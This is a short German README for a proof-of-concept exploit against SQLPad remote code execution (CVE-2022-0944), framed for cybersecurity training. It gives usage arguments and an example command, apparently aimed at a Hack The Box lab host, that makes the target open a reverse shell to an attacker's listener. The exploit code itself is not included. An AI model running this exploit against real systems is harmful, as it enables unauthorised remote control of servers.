
Proof-of-concept-Exploit für SQLPad RCE (CVE-2022-0944), der eine Reverse-Shell zu einem angreifergesteuerten Listener auslöst. Vorgesehen für den Einsatz in der Cybersicherheitsausbildung.
Proof-of-Concept-Exploit für SQLPad RCE (CVE-2022-0944), der zu einer RCE mit einer Reverse Shell auf den Rechner des Angreifers führt.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
Beispiel:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Dieses Repository enthält Tools, die ausschließlich zu Bildungszwecken entwickelt wurden, insbesondere für den Einsatz in Cybersicherheits-Lernumgebungen. Der Autor dieses Codes übernimmt keine Verantwortung für irgendwelche Konsequenzen, die aus der Nutzung, dem Missbrauch oder der Modifikation dieses Codes entstehen. Der Code wird „as is“ ohne jegliche Gewährleistung, weder ausdrücklich noch implizit, bereitgestellt, einschließlich, aber nicht beschränkt auf die stillschweigenden Garantien der Marktgängigkeit oder der Eignung für einen bestimmten Zweck.